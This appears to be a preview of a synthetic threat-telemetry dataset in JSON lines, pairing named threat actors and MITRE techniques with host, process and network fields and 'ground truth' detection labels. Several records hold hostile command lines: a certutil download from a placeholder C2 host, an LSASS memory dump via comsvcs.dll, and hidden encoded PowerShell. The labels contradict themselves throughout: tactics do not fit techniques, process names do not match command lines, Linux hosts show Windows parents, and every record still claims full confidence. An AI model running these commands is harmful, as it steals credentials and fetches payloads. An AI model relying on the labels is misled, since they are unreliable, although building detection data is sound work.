text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20250713T091253000Z_0006001","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.12.162.228","name":"APP-WEB-Y4HLUO91BA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6001Scattered SpiderT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.104.19.183","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-12T14:22:33.000Z","user":{"name":"arn:aws:iam::hafvs43ntjoq","sid":"S-1-5-21-170774468-691513077-1614"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250522T051435000Z_0006003","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.211.200.69","name":"EC2-INST-LOOV8B3VYE","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6003APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.118.85.95","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-27T01:32:28.000Z","user":{"name":"azuread\\o220eyit35xc","sid":"S-1-5-21-199026698-852829768-5310"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Reconnaissance","Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250630T143055000Z_0006005","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.108.57.15","name":"DB-ORACLE-10SZDFTLGI","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6005UNC4841T1071.001"},"network":{"domain":"github.com","dst_ip":"1.34.84.200","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-01T05:15:39.000Z","user":{"name":"svc_606bfihwe0b6","sid":"S-1-5-21-354650187-792642666-7411"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Initial Access","Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250107T083858000Z_0006007","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.38.210.144","name":"IAM-ROLE-DDMQOLDENZ","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6007FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.136.121.197","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-07T17:38:36.000Z","user":{"name":"arn:aws:iam::wl3b1jjhpslq","sid":"S-1-5-21-717771500-303091918-5499"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20260702T105910000Z_0006009","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.43.121.179","name":"IAM-ROLE-9TI9JZ73GM","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6009Scattered SpiderT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.23.204.241","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-21T23:15:43.000Z","user":{"name":"arn:aws:iam::mzs39592rili","sid":"S-1-5-21-191191992-717398626-9310"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Reconnaissance","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20261126T073503000Z_0006011","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.60.171.248","name":"AZURE-VM-ZQJGCJGL8Z","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6011Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.2.66.130","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-20T02:32:46.000Z","user":{"name":"i-ptzwy077v2pt","sid":"S-1-5-21-612011932-177331310-2412"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Execution"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250901T050735000Z_0006013","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.6.235.162","name":"DB-ORACLE-RYQ4HBWOEE","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6013Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.144.203.164","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-13T08:24:11.000Z","user":{"name":"i-xjhvt2vpt6go","sid":"S-1-5-21-458944273-217871267-6666"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Lateral Movement","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260630T041221000Z_0006015","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.200.116.14","name":"AZURE-VM-TGTVN4SWGO","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6015Lapsus$T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.113.174.172","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1133 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-29T11:48:22.000Z","user":{"name":"i-x7d7sl8ogxh8","sid":"S-1-5-21-525988213-874851140-2255"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Impact"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20250814T060239000Z_0006017","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.231.53.144","name":"IAM-ROLE-HBQOMH3DP0","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6017Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.37.133.146","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-22T23:01:59.000Z","user":{"name":"svc_sqvifvhgft9i","sid":"S-1-5-21-292761298-788175322-7147"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250429T221638000Z_0006019","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.227.107.141","name":"EC2-INST-LQAQAUP4PO","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6019Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.110.57.212","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1099 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-23T21:10:51.000Z","user":{"name":"i-yz7qvn6g6p17","sid":"S-1-5-21-191594163-968731420-5528"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution"],"technique_id":"T1531"},"event_id":"evt_unc4841_20261004T222624000Z_0006021","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.131.128.2","name":"WIN-FIN-SRV-LZH57CJKZN","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6021UNC4841T1531"},"network":{"domain":"github.com","dst_ip":"1.16.175.91","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-26T16:40:50.000Z","user":{"name":"CORP\\d1wqoe0r8po8","sid":"S-1-5-21-955180370-789749380-6417"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250430T051316000Z_0006023","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.61.194.166","name":"APP-WEB-XVQX2GUKRE","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6023Lapsus$T1071.001"},"network":{"domain":"github.com","dst_ip":"1.89.136.183","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 521 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-20T13:32:22.000Z","user":{"name":"CORP\\3ddohvcbkiyj","sid":"S-1-5-21-687320784-995703328-8218"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20250502T035944000Z_0006025","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.27.53.122","name":"AZURE-VM-E0SZOS0TA4","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6025Mustang PandaT1071.001"},"network":{"domain":"github.com","dst_ip":"1.73.87.213","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-04T23:11:47.000Z","user":{"name":"i-38vr8az1px0l","sid":"S-1-5-21-636315063-969076636-3448"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20261226T192404000Z_0006027","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.159.223.27","name":"WIN-FIN-SRV-B4828KWXOZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6027Volt TyphoonT1566.001"},"network":{"domain":"github.com","dst_ip":"1.60.173.209","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-19T17:22:15.000Z","user":{"name":"i-bmcq0wbyjulh","sid":"S-1-5-21-644198267-155248108-4945"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Collection"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260711T151922000Z_0006029","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.145.47.143","name":"EC2-INST-UJH06D1OSU","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6029Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.31.122.190","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-22T12:40:24.000Z","user":{"name":"svc_7787lt6bmgzq","sid":"S-1-5-21-949923357-967908732-6192"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250313T200532000Z_0006031","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.102.219.17","name":"APP-WEB-DU97B771WA","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6031UNC4841T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.144.84.44","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-25T15:33:25.000Z","user":{"name":"arn:aws:iam::4smmh83gqs13","sid":"S-1-5-21-866845090-463449717-7789"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250508T180822000Z_0006033","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.139.163.212","name":"EC2-INST-YL1QE74UBL","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6033APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.104.160.168","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-11-07T02:40:09.000Z","user":{"name":"i-737s60mxl4oe","sid":"S-1-5-21-599614296-112733128-9306"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20250208T202219000Z_0006035","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.187.200.239","name":"IAM-ROLE-HBM23KU3BW","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6035APT29T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.113.6.202","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-09-02T09:37:39.000Z","user":{"name":"azuread\\ia9bary8gxm0","sid":"S-1-5-21-899399603-768452963-7058"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Discovery"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20260627T134310000Z_0006037","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.135.189.90","name":"WIN-FIN-SRV-45I5EQHNOR","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6037FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.138.114.24","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2910 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-16T21:46:57.000Z","user":{"name":"CORP\\c2ayalw9zxhb","sid":"S-1-5-21-317046738-936779517-2313"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20261028T035345000Z_0006039","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.58.90.116","name":"AZURE-VM-5EZR7B384J","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6039FIN7T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.87.41.102","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-31T05:08:16.000Z","user":{"name":"arn:aws:iam::upfqgmk5qr02","sid":"S-1-5-21-789414507-435020292-4364"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Discovery","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20261117T234103000Z_0006041","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.248.51.201","name":"APP-WEB-5HJ1R1C5R0","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6041Mustang PandaT1566.001"},"network":{"domain":"github.com","dst_ip":"1.176.138.58","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3101 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-08-27T04:41:03.000Z","user":{"name":"svc_5tdrwwye6qfc","sid":"S-1-5-21-227398159-279526615-1751"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20251112T074611000Z_0006043","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.105.215.164","name":"DB-ORACLE-NSD5IOUPN6","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6043Mustang PandaT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.183.191.128","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1396 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-03T09:36:28.000Z","user":{"name":"arn:aws:iam::u8ant22y2vli","sid":"S-1-5-21-300684898-501508292-8864"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Collection","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250104T022440000Z_0006045","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.15.140.104","name":"EC2-INST-XTP2YFJO9D","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6045Scattered SpiderT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.94.134.249","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-17T04:44:34.000Z","user":{"name":"i-ok5zi49hyczs","sid":"S-1-5-21-490325445-812871272-8154"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20261212T055237000Z_0006047","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.146.138.19","name":"EC2-INST-8PFXFX9N7V","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6047Mustang PandaT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.102.47.109","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2818 C:\\temp\\lsass.dmp 